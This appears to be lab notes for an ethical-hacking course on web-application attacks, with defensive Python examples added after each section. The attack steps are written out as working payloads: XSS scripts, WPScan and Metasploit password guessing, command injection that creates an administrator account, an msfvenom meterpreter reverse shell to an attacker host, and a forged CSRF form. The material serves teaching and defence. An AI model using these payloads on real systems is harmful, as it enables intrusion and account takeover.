Hacking Web Applications

--- Hacking a web application by manipulating the application logic via the web interface

--- Hacking a web application via SQL injection attacks, cross-site scripting (XSS), cross-site request forgery (CSRF), insecure communication and others

--- Web application vulnerabilities and attacks such as

    1. Parameter tampering
    2. Cross Site Scripting (XSS)
    3. Stored XSS
    4. Username and Password Enumeration
    5. Exploiting Wordpress Plugin Vulnerability
    6. Exploiting Remote Command Execution Vulnerability
    7. Web Application Auditing Framework
    8. Website Vulnerability Scanning


1. Exploiting Parameter Tampering and XSS Vulnerabilities in Web Applications

--- Perform parameter tampering and XSS attacks and malicious tasks

--- A tampering attack is aimed at permissions, price and quantity of a product

--- Performing parameter tampering and Cross Site Scripting (XSS or CSS)

---> Open Chrome and type the movie website or any website we are testing

---> We log in to the website as a user and view the profile

---> We are redirected to the profile page and we can see in the URL that the ID parameter is ID=2

---> Let's try to change the ID parameter to id=3 and press Enter; we find another user's profile

---> When we change the ID value and get a different user's profile, it is called parameter tampering

---> An XSS attack allows an attacker to inject client-side scripts

---> Click the Contacts tab, which redirects you to the Contact us page; here you will perform the XSS attack

---> Here there is a form; in the Comment field inject the script <script>alert("This is XSS attack")</script>

---> If we open the website in another browser or operating system, the script we injected into the application also executes
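
Added example (not part of the original post): the two flaws from this lab next to their fixes, an ownership check on the id parameter and HTML-encoding of stored comments at output time. The profile data, function names and the Forbidden exception are assumptions made for the illustration.

```python
import html

# Constructed sample data: profiles keyed by the id value seen in the URL.
PROFILES = {
    2: {"name": "user-two", "email": "two@example.test"},
    3: {"name": "user-three", "email": "three@example.test"},
}

class Forbidden(Exception):
    """Raised when the logged-in user may not read the requested object."""

def view_profile_vulnerable(session_user_id, requested_id):
    # "Before": the id from the URL is trusted, so id=3 returns another
    # user's profile to whoever is logged in.
    return PROFILES[int(requested_id)]

def view_profile_hardened(session_user_id, requested_id):
    # "After": the id must parse as an integer AND belong to the session user.
    try:
        rid = int(requested_id)
    except (TypeError, ValueError):
        raise Forbidden("malformed id")
    if rid != session_user_id or rid not in PROFILES:
        raise Forbidden("not your profile")
    return PROFILES[rid]

def render_comments_vulnerable(comments):
    # "Before": stored comments are concatenated into the page as markup.
    return "".join(f"<li>{c}</li>" for c in comments)

def render_comments_hardened(comments):
    # "After": every stored comment is HTML-encoded at output time, so it is
    # displayed as text in every browser that loads the page.
    return "".join(f"<li>{html.escape(c)}</li>" for c in comments)

if __name__ == "__main__":
    stored = ['<script>alert("This is XSS attack")</script>']
    print(view_profile_vulnerable(2, "3"))
    print(render_comments_hardened(stored))
```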


2. Enumerating and Hacking a Web Application Using WPScan and Metasploit

--- Most websites are built in WordPress; we also enumerate the usernames

--- Crack the password by performing a dictionary attack using an msf auxiliary module

--- We enumerate the users and perform the dictionary attack using Metasploit

Tool : WPScan (Linux)

---> In terminal type
# wpscan --url [url or ip address]:8080/ceh --enumerate u

---> In a new terminal launch msfconsole, search for the auxiliary wordpress_login_enum and perform a dictionary attack using Password.txt in the wordlist folder
# msfconsole > search auxiliary wordpress_login_enum
# use auxiliary/scanner/http/wordpress_login_enum
# show options -- PASS_FILE -- set the path to the password.txt file, RHOSTS -- 8080, IP address of target machine, RPORT -- 4444, TARGETURI -- enter the WordPress website URL, USERNAME -- give the username
# exploit

---> When the attack is completed we get the password for the user; go to the browser and open the website admin login panel

---> Log in to the website with the credentials we found; you are now logged in without authorization
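
Added example (not part of the original post): how the enumeration and dictionary attack from this lab look in a web server access log, and a small detector for them. The log lines are constructed, the thresholds are arbitrary, and the code assumes that enumeration appears as ?author=N requests and that a failed WordPress login answers 200 while a successful one redirects with 302.

```python
import re
from collections import defaultdict

# Combined-log-format fields we need: client IP, method, path, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
AUTHOR_RE = re.compile(r"[?&]author=(\d+)")

def detect(lines, author_threshold=3, login_threshold=5):
    """Return {ip: [finding, ...]} for clients over either threshold."""
    authors = defaultdict(set)   # ip -> distinct author ids probed
    failures = defaultdict(int)  # ip -> failed login POSTs
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m.groups()
        probe = AUTHOR_RE.search(path)
        if method == "GET" and probe:
            authors[ip].add(probe.group(1))
        # Assumption: a failed WordPress login re-renders the form (200),
        # a successful one redirects (302).
        elif (method == "POST" and status == "200"
              and path.split("?")[0].endswith("/wp-login.php")):
            failures[ip] += 1
    findings = defaultdict(list)
    for ip, ids in authors.items():
        if len(ids) >= author_threshold:
            findings[ip].append("user-enumeration")
    for ip, count in failures.items():
        if count >= login_threshold:
            findings[ip].append("password-guessing")
    return dict(findings)

# Constructed sample log: one noisy client, one normal login.
TS = "[01/Jan/2024:10:00:00 +0000]"
SAMPLE = (
    [f'203.0.113.7 - - {TS} "GET /ceh/?author={i} HTTP/1.1" 301 0 "-" "-"'
     for i in range(1, 5)]
    + [f'203.0.113.7 - - {TS} "POST /ceh/wp-login.php HTTP/1.1" 200 4512 "-" "-"'] * 6
    + [f'198.51.100.9 - - {TS} "POST /ceh/wp-login.php HTTP/1.1" 302 0 "-" "-"']
)

if __name__ == "__main__":
    print(detect(SAMPLE))
```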


3. Exploiting Remote Command Execution Vulnerability to compromise a Target Web Server

--- Extract information about the target machine, create a user account, use the account to log in to the target machine

--- Exploiting command line execution vulnerabilities

---> Open any browser and open the website to test

---> If a command injection vulnerability exists in the web application, we enter some payloads to get interesting information

Payload : ping [ip or device] --- checks whether the host is live or not
        | hostname -- shows the hostname of the target machine
        | whoami -- extracts more information about the target
        | tasklist -- all processes running on the target machine
        | dir C:\  -- view the files and directories in C:\
        | net user -- obtain information related to user accounts
        | net user Mitesh /Add -- creates a user account named Mitesh
        | net localgroup Administrators Mitesh /Add --- gives administrative privileges to the Mitesh account

---> Start the Remote Desktop Connection application on Windows and set the IP address of the target machine

---> Enter Mitesh as the username, leave the password field blank and click OK. In this way we create a remote connection using command injection
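
Added example (not part of the original post): why the ping field accepts the "|" payloads above, and a hardened version that validates the value and never hands it to a shell. The function names are assumptions, and "-n 1" assumes a Windows ping as on the lab target.

```python
import ipaddress
import re
import subprocess

# One DNS label: letters, digits, inner hyphens; never starts with "-".
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"{LABEL}(?:\.{LABEL})*")

def build_ping_vulnerable(host):
    # "Before": the field is pasted into a command string for the shell, so
    # "|" and "&" in the input start further commands.
    return "ping -n 1 " + host

def build_ping_hardened(host):
    # "After": accept only an IP literal or a hostname, and return an argv
    # list so no shell ever parses the value.
    host = host.strip()
    try:
        target = str(ipaddress.ip_address(host))
    except ValueError:
        if len(host) > 253 or not HOST_RE.fullmatch(host):
            raise ValueError("not an IP address or hostname")
        target = host
    return ["ping", "-n", "1", target]

def ping(host):
    # Runs the validated argv directly (shell=False is the default).
    result = subprocess.run(build_ping_hardened(host),
                            capture_output=True, timeout=10)
    return result.returncode
```

Running the web application under a low-privilege service account limits what an injected command such as net user could change even if a validation gap remains.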


4. Exploiting File Upload Vulnerability

--- Take advantage of a file upload vulnerability and get remote code execution with msfconsole

---> We create a payload to upload to get a reverse shell; we use msfvenom and meterpreter
# msfvenom -p php/meterpreter/reverse_tcp lhost=[attacker ip address]  lport=4444 -f raw

---> Select the payload generated in PHP format, open Leafpad or Notepad, paste the payload and save it with the .php extension (payload.php)

---> Open a browser and go to the website where the file upload vulnerability is

---> If the website allows only specific file formats, we save the file in .JPEG or .PNG format

---> Open msfconsole
# use multi/handler
# set payload php/meterpreter/reverse_tcp
# set lhost [attacker ip address]
# set lport 4444
# exploit

---> Copy the path where we uploaded the payload file and enter it in the URL

---> We get a meterpreter session and we get the information we want
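
Added example (not part of the original post): an upload check that trusts the file name, next to one that checks the final extension and the file signature and stores the file under a server-generated name. The function names and sample bytes are constructed for the illustration.

```python
import os
import secrets

# Allowed extensions and the file signature each one must start with.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}

def accept_upload_vulnerable(filename, data):
    # "Before": only looks for an allowed extension somewhere in the name and
    # keeps the client's filename, so a script renamed to look like an image
    # is stored where it can be requested by URL.
    if not any(ext in filename.lower() for ext in MAGIC):
        raise ValueError("extension not allowed")
    return filename

def accept_upload_hardened(filename, data):
    # "After": the final extension must be allowed, the bytes must carry the
    # matching signature, and the stored name is generated by the server.
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in MAGIC:
        raise ValueError("extension not allowed")
    if not data.startswith(MAGIC[ext]):
        raise ValueError("content does not match extension")
    return secrets.token_hex(16) + ext

# Constructed sample inputs: a harmless stand-in for script text, and the
# first bytes of a PNG file.
FAKE_SCRIPT = b"<?php /* placeholder */ ?>"
REAL_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
```

A signature check alone is not sufficient; the upload directory should also be one the web server never executes scripts from.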


--- Performing Cross Site Request Forgery (CSRF) Attack

--- CSRF allows an attacker to force an unsuspecting user's browser to send malicious requests

--- It is used to modify and retrieve account information; we perform a CSRF attack

--- In CSRF the user clicks a malicious link containing arbitrary code; when the user clicks the link, it executes the arbitrary code on the trusted server

---> Open the website on which we perform the CSRF attack in Chrome or Firefox

---> Open the terminal and type
# wpscan --url [url]:8080 --enumerate vp

---> Type the following code in Notepad

     <form method="post" action="url infected in csrf">
       <script>alert("Enable a security")</script>
       <input type="hidden" name="whitelisted_ip[]" value="ip address of target">
       <input type="hidden" name="set_whitelist_ip" value="Set Whitelisted IPs" class="button-secondary">
       <input type="submit">
     </form>

---> Save the file as .html (security.html)
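
Added example (not part of the original post): the server-side check that makes a form like security.html fail, a token bound to the user's session that the forged page cannot know. The handler name, the csrf_token field, the session id and the IP value are assumptions made for the illustration.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # per-deployment secret, never sent to clients

def issue_token(session_id):
    # Token bound to one session; embedded as a hidden field in the real form.
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def handle_whitelist_post(session_id, form):
    """Return an HTTP status for a POST that changes the IP whitelist."""
    sent = form.get("csrf_token", "")
    expected = issue_token(session_id)
    # Constant-time comparison; a missing or foreign token is refused.
    if not hmac.compare_digest(sent.encode(), expected.encode()):
        return 403
    if "set_whitelist_ip" not in form:
        return 400
    return 200  # the whitelist update would happen here

# Constructed requests. The forged one carries only the fields from the
# page's security.html form; the browser adds the victim's session cookie.
ADMIN_SESSION = "constructed-session-id-admin"
FORGED = {"whitelisted_ip[]": "203.0.113.50",
          "set_whitelist_ip": "Set Whitelisted IPs"}
GENUINE = dict(FORGED, csrf_token=issue_token(ADMIN_SESSION))

if __name__ == "__main__":
    print(handle_whitelist_post(ADMIN_SESSION, FORGED))   # forged form
    print(handle_whitelist_post(ADMIN_SESSION, GENUINE))  # real settings page
```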













